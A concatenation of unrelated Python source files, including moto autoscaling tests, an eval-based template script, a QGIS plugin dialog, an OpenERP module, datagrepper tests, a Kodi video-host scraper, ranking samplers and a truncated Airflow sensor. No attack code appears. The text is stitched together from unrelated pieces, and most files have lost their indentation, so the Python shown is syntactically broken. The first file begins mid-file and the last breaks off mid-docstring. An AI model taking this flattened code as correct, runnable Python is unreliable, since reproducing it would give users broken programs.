def test_execute_policy_percent_change_in_capacity():
setup_autoscale_group()
conn = boto.connect_autoscale()
policy = ScalingPolicy(
name='ScaleUp',
adjustment_type='PercentChangeInCapacity',
as_name='tester_group',
scaling_adjustment=50,
)
conn.create_scaling_policy(policy)
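    # 50% of the group's 2 instances is 1, so executing the policy grows the
    # group from 2 to 3 instances.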
conn.execute_policy("ScaleUp")
instances = list(conn.get_all_autoscaling_instances())
instances.should.have.length_of(3)
@mock_autoscaling
def test_execute_policy_small_percent_change_in_capacity():
""" http://docs.aws.amazon.com/AutoScaling/latest/DeveloperGuide/as-scale-based-on-demand.html
If PercentChangeInCapacity returns a value between 0 and 1,
Auto Scaling will round it off to 1."""
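    # 1% of the 2-instance group is 0.02, which rounds up to 1, so the group
    # still grows from 2 to 3 instances.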
setup_autoscale_group()
conn = boto.connect_autoscale()
policy = ScalingPolicy(
name='ScaleUp',
adjustment_type='PercentChangeInCapacity',
as_name='tester_group',
scaling_adjustment=1,
)
conn.create_scaling_policy(policy)
conn.execute_policy("ScaleUp")
instances = list(conn.get_all_autoscaling_instances())
instances.should.have.length_of(3)
|
#!/usr/bin/env python3
"""
Python script to evaluate and insert python expression in files
"""
import argparse
import importlib
import re
import sys
import traceback as tb
from pathlib import Path
from types import ModuleType
from typing import Any, Dict, Generator, List, NoReturn, TextIO, Tuple, Union
if sys.version_info < (3, 8):
raise RuntimeError("This script requires python 3.8 or higher")
is_whitespace = re.compile(r"^\s*$").match
class HandledException(Exception):
"""
Exception that was already printed
"""
def process_template(
in_file: TextIO,
start_delimiter: str,
end_delimiter: str,
globalns: Dict[str, Any],
localns: Dict[str, Any],
) -> Generator[str, None, None]:
"""
    Read lines from a file, evaluating expressions found between the start
    and end delimiters.
"""
lineno = 0
for line in in_file:
lineno += 1
start, end = 0, 0
indent = ""
while (start := line.find(start_delimiter, end)) >= 0:
if end == 0 and is_whitespace(line[:start]):
indent = line[:start]
yield line[end:start]
start += len(start_delimiter)
expr = ""
offset = 0
while (end := line.find(end_delimiter, start)) < 0:
expr += line[start:]
line = next(in_file)
offset += 1
start = 0
expr += line[start:end]
try:
value = eval(expr, globalns, localns)
except Exception as err:
print(
f"Expression at line {lineno}{'-' + str(lineno + offset) if offset else ''} raised an exception"
)
print("Offending expression:", start_delimiter + expr + end_delimiter)
print(
"Exception raised:\n\n",
"".join(tb.format_exception(type(err), err, err.__traceback__)),
)
raise HandledException from err
if not isinstance(value, str):
print(
f"Expression at line {lineno}{'-' + str(lineno + offset) if offset else ''} does not evaluate to a string"
)
print(f"Offending expression:", start_delimiter + expr + end_delimiter)
raise HandledException from ValueError(
f"{start_delimiter + expr + end_delimiter} does not evaluate to a string"
)
if indent:
value = value.replace("\n", "\n" + indent)
yield value
end += len(end_delimiter)
lineno += offset
offset = 0
yield line[end:]
def main(
input: Path,
output: Path,
delimiters: Union[Tuple[str], Tuple[str, str]],
global_namespaces: List[str] = (),
local_namespaces: List[str] = (),
) -> NoReturn:
"""
Main script entry point
"""
    # resolve the start and end delimiters
start_delimiter = delimiters[0]
end_delimiter = delimiters[0] if len(delimiters) == 1 else delimiters[1]
# load namespaces
globalns, localns = {}, {}
for ns, source_list in zip(
(globalns, localns),
(global_namespaces, local_namespaces),
):
for name in source_list:
try:
try:
# assume we are loading a module
module = importlib.import_module(name)
ns.update(vars(module))
except ImportError:
# assume last element in name is an attribute
module_name, attr_name = name.rsplit(".", maxsplit=1)
module = importlib.import_module(module_name)
ns.update(getattr(module, attr_name))
except Exception as err:
print(
"error: Could not load {name} due to:",
"".join(tb.format_exception(type(err), err, err.__traceback__)),
sep="\n\n",
)
exit(-1)
# process and write lines
with input.open() as in_file:
try:
with output.open("wt") as out_file:
out_file.writelines(
process_template(
in_file,
start_delimiter,
end_delimiter,
globalns,
localns,
)
)
except HandledException:
print("An error occured, see above")
print("Deleting output file ...")
output.unlink(missing_ok=True)
except Exception as err:
print("An unhandled error occured, see below")
print("Deleting output file ...")
output.unlink(missing_ok=True)
raise err
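# Hypothetical usage (script and file names below are illustrative, not taken
# from this source): evaluate "$$ ... $$" expressions in template.txt, with
# the math module available to them, and write the result to out.txt:
#
#   python eval_template.py template.txt out.txt -d '$$' -g math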
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="""
Evaluate python expressions in files and replace them by their value.
    This script will find expressions between delimiters in a file, evaluate them
    and replace the expressions by their value in the output file. The namespace in
    which the expressions are evaluated can be populated.
If the resulting value contains newlines, and there was indentation before the
start delimiter, the indentation is preserved before each newline. This allows
for prettier formatting of the output.""",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument(
"input",
type=Path,
help="File to read from and evaluate expressions in",
)
parser.add_argument(
"output",
type=Path,
help="File to write the content of the input with evaluated expressions",
)
delimiter_group = parser.add_argument_group(title="delimiter arguments")
delimiter_group.add_argument(
"-d",
"--delimiters",
default=["$$"],
nargs="+",
help=(
"Delimiters that marks the start and end of an expression."
" If only one is provided, it is used as both the start and end delimiter."
" If two are used, the first is the start delimiter, the second is the end delimiter."
),
)
namespace_group = parser.add_argument_group(title="namespace arguments")
namespace_group.add_argument(
"-g",
"--global-namespaces",
type=str,
nargs="*",
default=[],
help=(
"Namespaces to load into the global namespace."
" The packages and modules are loaded from left to right and can overwrite previous values."
" The syntax is the same than the python 'import' statement, but you can end the dotted chain by an attribute of a module."
),
)
namespace_group.add_argument(
"-l",
"--local-namespaces",
type=str,
nargs="*",
default=[],
help=(
"Namespaces to load into the local namespace."
" The packages and modules are loaded from left to right and can overwrite previous values."
" The syntax is the same than the python 'import' statement, but you can end the dotted chain by an attribute of a module."
" The local namespace can be edited by expressions with side-effects, such as the walrus operator ':='."
),
)
args = parser.parse_args()
# check arguments
if not args.input.is_file():
parser.error(f"{args.input!s} doesn't exists or is not a file")
if not isinstance(args.delimiters, list):
args.delimiters = [args.delimiters]
if not 0 < len(args.delimiters) < 3:
parser.error("there must be one or two delimiters")
main(**vars(args))
|
"""
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
Drawing Tool - Quantum GIS python plugin for a user-selected rectangle
Author: Wan Wei
Date: 2015-11-06
Version: 0.1.0
"""
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from PyQt4.uic import *
from qgis.core import *
from qgis.gui import *
from ui_WidgetDrawingTool import Ui_WidgetDrawingTool
class DrawingToolDlg(QDialog, Ui_WidgetDrawingTool):
def __init__(self, iface):
        super(DrawingToolDlg, self).__init__(iface.mainWindow())
self.setupUi(self)
self.iface = iface
        self.canvas = self.iface.mapCanvas()
self.rectangle = QgsRectangle(0.0,0.0,0.0,0.0)
self.numCorners = 0
self.hasRectangle = False
self.isEmittingPoint = False # indicates whether rubber band points are being captured
# Set up the rubber band parameters
self.lineColor = QColor(255,0,0)
self.lineWidth = 2
# Init rubberBand
self.emitPoint = QgsMapToolEmitPoint(self.canvas)
QObject.connect(self.emitPoint,
SIGNAL("canvasClicked(const QgsPoint &, Qt::MouseButton)"),
self.drawingRectangle)
#self.label = QLabel(self)
#self.label.setGeometry(QRect(10, 120, 181, 31))
def drawingRectangle(self, point, button):
if self.hasRectangle: # just adjusting corners
self.adjustRectangle(point)
elif self.numCorners == 0: # no points yet - set first point
self.numCorners = 1
self.xStart = point.x()
self.yStart = point.y()
else: # have one corner, adding second one
            # create the rubber band used to display the clip area and set up its initial limits
self.rubberBand=QgsRubberBand(self.canvas)
self.rubberBand.setColor(self.lineColor)
self.rubberBand.setWidth(self.lineWidth)
self.rectangle.setXMinimum(min(self.xStart,point.x()))
self.rectangle.setYMinimum(min(self.yStart,point.y()))
self.rectangle.setXMaximum(max(self.xStart,point.x()))
self.rectangle.setYMaximum(max(self.yStart,point.y()))
self.numCorners = 2
self.adjustRectangle(point)
self.hasRectangle = True
self.updateCoordinates()
def adjustRectangle(self, point):
"""
Adjusts the clip rectangle according to the input point and redraws the rubber band
"""
if self.hasRectangle:
self.rubberBand.reset()
if abs(self.rectangle.xMinimum() - point.x()) < abs(self.rectangle.xMaximum() - point.x()):
# closest to the left - move that
self.rectangle.setXMinimum(point.x())
else:
# closest to the right - move that
self.rectangle.setXMaximum(point.x())
if abs(self.rectangle.yMinimum() - point.y()) < abs(self.rectangle.yMaximum() - point.y()):
# closest to the bottom - move that
self.rectangle.setYMinimum(point.y())
else:
# closest to the top - move that
self.rectangle.setYMaximum(point.y())
# draw the new clip rectangle
self.rubberBand.addPoint(QgsPoint(self.rectangle.xMaximum(), self.rectangle.yMaximum()))
self.rubberBand.addPoint(QgsPoint(self.rectangle.xMaximum(), self.rectangle.yMinimum()))
self.rubberBand.addPoint(QgsPoint(self.rectangle.xMinimum(), self.rectangle.yMinimum()))
self.rubberBand.addPoint(QgsPoint(self.rectangle.xMinimum(), self.rectangle.yMaximum()))
self.rubberBand.addPoint(QgsPoint(self.rectangle.xMaximum(), self.rectangle.yMaximum()))
def setDrawingTool(self):
if not self.isEmittingPoint and \
self.canvas.mapTool() != self.emitPoint:
self.canvas.setMapTool(self.emitPoint)
self.isEmittingPoint = True
def resetDrawingTool(self):
if self.isEmittingPoint and \
self.canvas.mapTool() == self.emitPoint:
self.canvas.unsetMapTool(self.emitPoint)
self.isEmittingPoint = False
if self.hasRectangle:
self.rubberBand.reset()
self.rubberBand.removeLastPoint()
self.canvas.refresh()
self.rubberBand = ''
self.hasRectangle = False
            self.numCorners = 0
self.rectangle = QgsRectangle(0.0,0.0,0.0,0.0)
self.labelButtomRight.setText(' ')
self.labelUpLeft.setText(' ')
def updateCoordinates(self):
self.labelButtomRight.setText('X ' + str(self.rectangle.xMaximum()) + ' ' + \
'Y ' + str(self.rectangle.yMinimum()))
self.labelUpLeft.setText('X ' + str(self.rectangle.xMinimum()) + ' ' + \
'Y ' + str(self.rectangle.yMaximum()))
"""
def getDrawingBounds(self):
self.label.setText(str(self.rectangle.xMinimum()) + ' ' + \
str(self.rectangle.yMaximum()) + ' ' + \
str(self.rectangle.xMaximum()) + ' ' + \
str(self.rectangle.yMinimum()))
"""
|
# -*- encoding: utf-8 -*-
###########################################################################
# Module Writen to OpenERP, Open Source Management Solution
#
# Copyright (c) 2012 Vauxoo - http://www.vauxoo.com/
# All Rights Reserved.
# info Vauxoo ([email protected])
############################################################################
# Coded by: moylop260 ([email protected])
# Isaac Lopez ([email protected])
############################################################################
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
import openerp.netsvc as netsvc
from openerp.osv import osv, fields
from mx import DateTime
from tools import config
from openerp.tools.translate import _
class purchase_order(osv.Model):
_inherit = "purchase.order"
def wkf_confirm_order(self, cr, uid, ids, context=None):
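        # After the standard confirmation succeeds, register the order's
        # partner as a supplier on every ordered product that does not
        # already list that partner in its supplierinfo records.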
product_supp_obj = self.pool.get('product.supplierinfo')
company_id = self.pool.get(
'res.users').browse(cr, uid, uid).company_id.id
product_obj = self.pool.get('product.template')
if super(purchase_order, self).wkf_confirm_order(cr, uid, ids,
context=context):
for po in self.browse(cr, uid, ids, context=context):
partner_id = po.partner_id.id
for line in po.order_line:
product_id = line.product_id.product_tmpl_id.id
if not product_supp_obj.search(cr, uid,
[('product_id', '=',
product_id),
('name', '=', partner_id)]):
                        product_obj.write(cr, uid, [product_id], {
                            'seller_ids': [(0, 0, {
                                'name': partner_id,
                                'min_qty': 1.0,
                                'delay': 1,
                                'sequence': 10,
                                'product_id': product_id,
                                'company_id': company_id,
                                'product_uom': (line and line.product_id and
                                                line.product_id.uom_id and
                                                line.product_id.uom_id.id),
                            })],
                        })
return True
else:
return False
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Interpreter version: python 2.7
#
"""
This module handles the list of Aleph's keywords, provides a REST API for
these keywords and allows translation of those keywords to their codes.
This module contains four major variables:
- KW_DICT (dict): ``keyword: {info}`` mapping.
- KEYWORDS (list): List of keywords.
- KEYWORDS_LOWER (list): List of keywords.lower()
- KW_CACHE_PATH (str): Path to the keyword file in ``/tmp`` (bottle
optimization).
"""
#
# Imports =====================================================================
import bz2
import json
import os.path
from os.path import join
from collections import OrderedDict
from bottle import get
from bottle import response
from ..settings import API_PATH
from shared import gzip_cache
from shared import JSON_MIME
from shared import to_gzipped_file
# Loaders =====================================================================
def read_kw_file():
"""
    Read the content of the file containing keyword information in JSON. The
    file is packed using BZIP2.
Returns:
list: List of dictionaries containing keywords.
"""
self_path = os.path.dirname(__file__)
kw_list_path = join(self_path, "../templates/keyword_list.json.bz2")
with bz2.BZ2File(kw_list_path) as f:
kw_list = f.read()
return json.loads(kw_list)
def build_kw_dict(kw_list):
"""
Build keyword dictionary from raw keyword data. Ignore invalid or
invalidated records.
Args:
kw_list (list): List of dicts from :func:`read_kw_file`.
Returns:
OrderedDict: dictionary with keyword data.
"""
kw_dict = OrderedDict()
    # records without "zahlavi" sort first and are skipped in the loop below
    sorted_list = sorted(
        kw_list,
        key=lambda x: x.get("zahlavi", u"").encode("utf-8")
    )
for keyword_data in sorted_list:
if "zahlavi" not in keyword_data:
continue
zahlavi = keyword_data["zahlavi"].encode("utf-8")
old_record = kw_dict.get(zahlavi)
if not old_record:
kw_dict[zahlavi] = keyword_data
continue
key = "angl_ekvivalent"
if not old_record.get(key) and keyword_data.get(key):
kw_dict[zahlavi] = keyword_data
continue
key = "zdroj_angl_ekvivalentu"
if not old_record.get(key) and keyword_data.get(key):
kw_dict[zahlavi] = keyword_data
continue
if len(str(keyword_data)) > len(str(old_record)):
kw_dict[zahlavi] = keyword_data
continue
return kw_dict
# Variables ===================================================================
_INITIALIZED = False
KW_DICT = None # Output from :func:`build_kw_dict`.
KEYWORDS = None # List of strings with keywords.
KEYWORDS_LOWER = None # Dict mapping keyword.lower() to the original keyword.
#: Path to the unpacked keyword list in /tmp. This is used as bottle
#: optimization.
KW_CACHE_PATH = None
def init():
"""
Initialize all global variables (:attr:`.KW_DICT`, :attr:`.KEYWORDS`,
:attr:`.KEYWORDS_LOWER`, :attr:`.KW_CACHE_PATH`) to their values.
Global variables are then used from analyzers and so on.
"""
global _INITIALIZED
if _INITIALIZED:
return
global KW_DICT
global KEYWORDS
global KW_CACHE_PATH
global KEYWORDS_LOWER
KW_DICT = build_kw_dict(read_kw_file())
KEYWORDS = sorted([k.decode("utf-8") for k in KW_DICT.keys()])
KEYWORDS_LOWER = {
k.lower(): k
for k in KEYWORDS
}
keywords_json = json.dumps(KEYWORDS)
KW_CACHE_PATH = "/tmp/wa_kat_cache_keywords.json"
# create cached files
with open(KW_CACHE_PATH, "w") as f:
f.write(keywords_json)
with open(KW_CACHE_PATH + ".gz", "w") as f:
to_gzipped_file(keywords_json, out=f)
_INITIALIZED = True
init()
# Functions ===================================================================
def keyword_to_info(keyword):
"""
Get keyword dict based on the `keyword`.
Args:
keyword (str): Keyword as string.
Returns:
dict: Additional keyword info.
"""
return KW_DICT.get(keyword)
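# A minimal usage sketch (illustrative only; the keyword below is an assumed
# value and the keys of KW_DICT are utf-8 encoded strings):
#
#     info = keyword_to_info("informatika")
#     if info:
#         print(info.get("angl_ekvivalent"))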
# API =========================================================================
@get(join(API_PATH, "kw_list.json"))
def get_kw_list():
"""
Virtual ``kw_list.json`` file.
List of all keywords on one JSON page. This is later used by the typeahead
    script, which shows keyword hints to the user.
"""
response.content_type = JSON_MIME
return gzip_cache(KW_CACHE_PATH)
|
# SPDX-License-Identifier: GPL-2.0+
# Copyright 2018 Mike Bonnet <[email protected]>
import json
import os
import unittest
from datetime import datetime, timedelta
from unittest.mock import MagicMock, patch
with patch.dict(os.environ, DATAGREPPER_CONFIG="/dev/null"):
import datagrepper.app
class TestAPI(unittest.TestCase):
def setUp(self):
datagrepper.app.app.testing = True
self.client = datagrepper.app.app.test_client()
@patch("datagrepper.app.dm.Message.grep", return_value=(0, 0, []))
def test_raw_defaults(self, grep):
resp = self.client.get("/raw")
self.assertEqual(resp.status_code, 200)
self.assertEqual(grep.call_args[0], ())
kws = grep.call_args[1]
self.assertIsNone(kws["start"])
self.assertIsNone(kws["end"])
self.assertEqual(kws["page"], 1)
self.assertEqual(kws["rows_per_page"], 25)
self.assertEqual(kws["order"], "desc")
for arg in [
"users",
"packages",
"categories",
"topics",
"contains",
"not_users",
"not_packages",
"not_categories",
"not_topics",
]:
self.assertEqual(kws[arg], [])
@patch("datagrepper.app.dm.Message.grep", return_value=(0, 0, []))
def test_raw_default_result(self, grep):
resp = self.client.get("/raw")
self.assertEqual(resp.status_code, 200)
result = json.loads(resp.get_data())
self.assertEqual(result["count"], 0)
self.assertEqual(result["pages"], 0)
self.assertEqual(result["total"], 0)
self.assertEqual(result["raw_messages"], [])
@patch("datagrepper.app.dm.Message.grep", return_value=(0, 0, []))
def test_raw_contains_delta(self, grep):
# At one point, this would produce a traceback/500.
resp = self.client.get("/raw?delta=14400&category=wat&contains=foo")
self.assertEqual(resp.status_code, 200)
@patch("datagrepper.app.dm.Message.grep", return_value=(0, 0, []))
def test_raw_contains_delta_and_start(self, grep):
resp = self.client.get("/raw?start=1564503781&delta=600")
self.assertEqual(resp.status_code, 200)
self.assertEqual(grep.call_args[0], ())
kws = grep.call_args[1]
expected_start = datetime.fromtimestamp(1564503781)
self.assertEqual(kws["start"], expected_start)
expected_end = expected_start + timedelta(seconds=600)
self.assertEqual(kws["end"], expected_end)
@patch("datagrepper.app.dm.Message.grep", return_value=(0, 0, []))
@patch.dict(datagrepper.app.app.config, {"DEFAULT_QUERY_DELTA": 180})
def test_raw_default_query_delta(self, grep):
resp = self.client.get("/raw")
self.assertEqual(resp.status_code, 200)
kws = grep.call_args[1]
# Verify the default query delta was applied
self.assertEqual((kws["end"] - kws["start"]).total_seconds(), 180.0)
@patch("datagrepper.app.dm.Message.grep", return_value=(0, 0, []))
@patch.dict(datagrepper.app.app.config, {"DEFAULT_QUERY_DELTA": 180})
def test_raw_default_query_delta_with_start(self, grep):
resp = self.client.get("/raw?start=1564503781")
self.assertEqual(resp.status_code, 200)
kws = grep.call_args[1]
# Verify the default query delta was not applied
self.assertNotEqual((kws["end"] - kws["start"]).total_seconds(), 180.0)
@patch("datagrepper.app.dm.Message.grep", return_value=(0, 0, []))
@patch.dict(datagrepper.app.app.config, {"DEFAULT_QUERY_DELTA": 180})
def test_raw_default_query_delta_with_delta(self, grep):
resp = self.client.get("/raw?delta=7200")
self.assertEqual(resp.status_code, 200)
kws = grep.call_args[1]
# Verify the default query delta was not applied
self.assertEqual((kws["end"] - kws["start"]).total_seconds(), 7200.0)
@patch("datagrepper.app.dm.Message.grep", return_value=(0, 0, []))
@patch.dict(datagrepper.app.app.config, {"DEFAULT_QUERY_DELTA": 180})
def test_raw_default_query_delta_with_end(self, grep):
resp = self.client.get("/raw?end=1564503781")
self.assertEqual(resp.status_code, 200)
kws = grep.call_args[1]
# Verify the default query delta was not applied
self.assertNotEqual((kws["end"] - kws["start"]).total_seconds(), 180.0)
@patch("datagrepper.app.dm.Message.grep", return_value=(0, 0, []))
def test_raw_contains_without_delta(self, grep):
"""https://github.com/fedora-infra/datagrepper/issues/206"""
resp = self.client.get("/raw?category=wat&contains=foo")
self.assertEqual(resp.status_code, 400)
target = b"When using contains, specify a start at most eight months"
assert target in resp.data, "%r not in %r" % (target, resp.data)
@patch("datagrepper.app.dm.Message.query", autospec=True)
def test_id(self, query):
msg = query.filter_by.return_value.first.return_value
msg.__json__ = MagicMock(return_value={"key": "value"})
resp = self.client.get("/id?id=one")
self.assertEqual(resp.status_code, 200)
self.assertEqual(query.filter_by.call_args, ((), {"msg_id": "one"}))
@patch("datagrepper.app.count_all_messages", autospec=True, return_value=42)
def test_count(self, count_all_messages):
resp = self.client.get("/messagecount")
self.assertEqual(resp.status_code, 200)
result = json.loads(resp.get_data())
self.assertEqual(result, {"messagecount": 42})
@patch("datagrepper.app.dm.Message.grep", return_value=(0, 0, []))
def test_chart_line(self, grep):
resp = self.client.get("/charts/line")
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.mimetype, "image/svg+xml")
self.assertIn(
b'<svg xmlns:xlink="http://www.w3.org/1999/xlink', resp.get_data()
)
|
import sys
import json
import urllib, urllib2
import xbmc
import xbmcgui
import XbmcHelpers
common = XbmcHelpers
from videohosts import tools
URL = "https://ahoy.yohoho.online/"
HEADERS = {
"Content-Type": "application/x-www-form-urlencoded",
"Origin": "https://yohoho.cc",
"Referer": "https://yohoho.cc/",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36"
}
HEADERS2 = {
"Host": "hdgo.cx",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
}
VALUES = {
"kinopoisk": "{0}",
"tv": "1",
"resize": "1",
"player": "videocdn,collaps,iframe,hdvb,kodik",
"button": "videocdn: {Q} {T}, hdvb: {Q} {T}, kodik: {Q} {T}, iframe: {Q} {T}",
"button_limit": "8",
"button_size": "1",
"separator": ","
}
#ENABLED_HOSTS = ("iframe", "kodik", "videocdn", "hdvb", "collaps")
ENABLED_HOSTS = ("hdvb", "collaps")
_kp_id_ = ''
def prepare_url(host, url):
if not url:
return ""
#response = tools.get_response(url, HEADERS2, {}, 'GET')
#if response:
# return common.parseDOM(response, "iframe", ret="src")[0]
#else:
return url
def get_add_info(translate, quality):
    translate = translate or ""
    quality = quality or ""
    if not translate and not quality:
        return ""
    return "({0})".format(translate + (("," + quality) if quality else ""))
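# For reference (illustrative values only):
#     get_add_info("dub", "HDRip")  ->  "(dub,HDRip)"
#     get_add_info("", "")          ->  ""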
def get_content():
vh_title = "yohoho."
list_li = []
VALUES["kinopoisk"] = _kp_id_
response = tools.get_response(URL, HEADERS, VALUES, 'POST')
#{"moonwalk":{},
#"hdgo":{},
#"trailer":{},
#"torrent":{},
#"videospider":{},
#"kodik":{},
#"videocdn":{"iframe":"//90.tvmovies.in/kLShoChnGWEE/movie/107","translate":"Полное дублирование","quality":"hddvd"},
#"hdvb":{"iframe":"https://vid1572801764.farsihd.pw/movie/db8f575a1374728dda63eb6244be9bca/iframe","translate":"многоголосый закадровый","quality":"HDRip"},
#"iframe":{"iframe":"https://videoframe.at/movie/42da420pb7p/iframe","translate":"","quality":""},
#"collaps":{"iframe":"https://api1572798262.buildplayer.com/embed/movie/334","translate":"","quality":""}}
if response:
jdata = json.loads(response)
for host in ENABLED_HOSTS:
host_data = jdata[host]
if host_data:
iframe = host_data["iframe"]
translate = host_data["translate"]
quality = host_data["quality"]
title_ = "*T*"
title = "[COLOR=orange][{0}][/COLOR] {1} {2}".format(vh_title + host, tools.encode(title_), get_add_info(translate, quality))
uri = sys.argv[0] + "?mode=show&url={0}".format(urllib.quote_plus(prepare_url(host, iframe)))
item = xbmcgui.ListItem(title)
list_li.append([uri, item, True])
return list_li
def process(kp_id):
global _kp_id_
_kp_id_ = kp_id
xbmc.log("yohoho:kp_id=" + kp_id)
list_li = []
try:
list_li = get_content()
except:
pass
return list_li
|
"""
byceps.services.shop.sequence.models
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:Copyright: 2006-2019 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from sqlalchemy.ext.hybrid import hybrid_property
from ....database import db
from ....util.instances import ReprBuilder
from ..shop.transfer.models import ShopID
from .transfer.models import Purpose
class NumberSequence(db.Model):
"""A shop-specific integer sequence for a purpose."""
__tablename__ = 'shop_sequences'
shop_id = db.Column(db.UnicodeText, db.ForeignKey('shops.id'), primary_key=True)
_purpose = db.Column('purpose', db.UnicodeText, primary_key=True)
prefix = db.Column(db.UnicodeText, unique=True, nullable=False)
value = db.Column(db.Integer, default=0, nullable=False)
def __init__(self, shop_id: ShopID, purpose: Purpose, prefix: str) -> None:
self.shop_id = shop_id
self.purpose = purpose
self.prefix = prefix
@hybrid_property
def purpose(self) -> Purpose:
return Purpose[self._purpose]
@purpose.setter
def purpose(self, purpose: Purpose) -> None:
assert purpose is not None
self._purpose = purpose.name
def __repr__(self) -> str:
return ReprBuilder(self) \
.add('shop', self.shop_id) \
.add('purpose', self.purpose.name) \
.add_with_lookup('prefix') \
.add_with_lookup('value') \
.build()
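# A minimal usage sketch (hedged: the shop ID, purpose member and prefix below
# are illustrative assumptions, not values defined in this module):
#
#     sequence = NumberSequence(ShopID('acme-2019'), Purpose.order, 'AC-19-B')
#     db.session.add(sequence)
#     db.session.commit()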
|
"""[rim.py]
Copyright (c) 2014, Andrew Perrault, Joanna Drummond
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import numpy
import random
import sys
def rim_sample(ref_ranking, parameters, debug=False):
sample = []
sample.append(ref_ranking[0])
for i in range(1, len(ref_ranking)):
sample.insert(numpy.nonzero(
numpy.random.multinomial(n=1, pvals=parameters[i]))[0],
ref_ranking[i])
return sample
def gen_dispersion_list(ref_ranking, dispersion, debug=False):
print "generating dispersion list, finished: ",
sys.stdout.flush()
parameters = {}
if dispersion == 0:
return ref_ranking
# have to translate to one-based indexing for the probabilities
for i in range(2, len(ref_ranking) + 1):
if i % 100 == 0:
print i,
sys.stdout.flush()
sample_prob = numpy.zeros(i)
for j in range(1, i + 1):
if dispersion == 1:
sample_prob[j - 1] = 1.0 / i
else:
sample_prob[j - 1] = (dispersion ** (i - j) *
(1 - dispersion) / (1 - dispersion ** i))
if debug:
assert sum(sample_prob) == 1
parameters[i - 1] = sample_prob
print "finished generating."
return parameters
def mallows_sample(ref_ranking, dispersion_list, debug=False):
return rim_sample(ref_ranking=ref_ranking, parameters=dispersion_list, debug=debug)
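# A minimal usage sketch (illustrative values; assumes a list-like reference
# ranking and a dispersion value phi in [0, 1]):
#
#     ref = range(10)
#     params = gen_dispersion_list(ref, 0.3)
#     sample = mallows_sample(ref, params)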
def mallows_sample_only_phi(ref_ranking, dispersion, debug=False):
parameters = {}
if dispersion == 0:
return ref_ranking
# have to translate to one-based indexing for the probabilities
for i in range(2, len(ref_ranking) + 1):
sample_prob = numpy.zeros(i)
for j in range(1, i + 1):
if dispersion == 1:
sample_prob[j - 1] = 1.0 / i
else:
sample_prob[j - 1] = (dispersion ** (i - j) *
(1 - dispersion) / (1 - dispersion ** i))
if debug:
assert sum(sample_prob) == 1
parameters[i - 1] = sample_prob
return rim_sample(ref_ranking=ref_ranking,
parameters=parameters, debug=debug)
def riffle_sample(ranking1, ranking2, sigma, debug=False):
sample = []
r1copy = list(ranking1)
r2copy = list(ranking2)
r1copy.reverse()
r2copy.reverse()
mixing_probability = max(min(random.gauss(0.25, sigma) if random.randint(0, 1)
else random.gauss(0.75, sigma), 1.0), 0.0)
for i in range(len(r1copy) + len(r2copy)):
if len(r1copy) == 0 and len(r2copy) == 0:
raise Exception('problem')
if len(r1copy) == 0:
sample.append(r2copy.pop())
continue
if len(r2copy) == 0 or random.random() <= mixing_probability:
sample.append(r1copy.pop())
continue
sample.append(r2copy.pop())
return sample
def plackett_luce_sample(parameters, ranking_length):
ranking = []
parameters = parameters / numpy.sum(parameters)
assert(ranking_length <= len(parameters))
while len(ranking) < ranking_length:
sampled = numpy.nonzero(numpy.random.multinomial(n=1, pvals=parameters))[0][0]
ranking.append(sampled)
sampled_prob = parameters[sampled]
parameters[sampled] = 0.
if numpy.sum(parameters) == 0.:
continue
parameters = parameters / (1 - sampled_prob)
return ranking
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from urllib.parse import urlparse
from airflow.exceptions import AirflowException
from airflow.sensors.base_sensor_operator import BaseSensorOperator
from airflow.utils.decorators import apply_defaults
class S3KeySensor(BaseSensorOperator):
"""
Waits for a key (a file-like instance on S3) to be present in a S3 bucket.
    S3 being a key/value store, it does not support folders. The path is just
    a key to a resource.
:param bucket_key: The key being waited on. Supports full s3:// style url
or relative path from root level. When it's specified as a full s3://
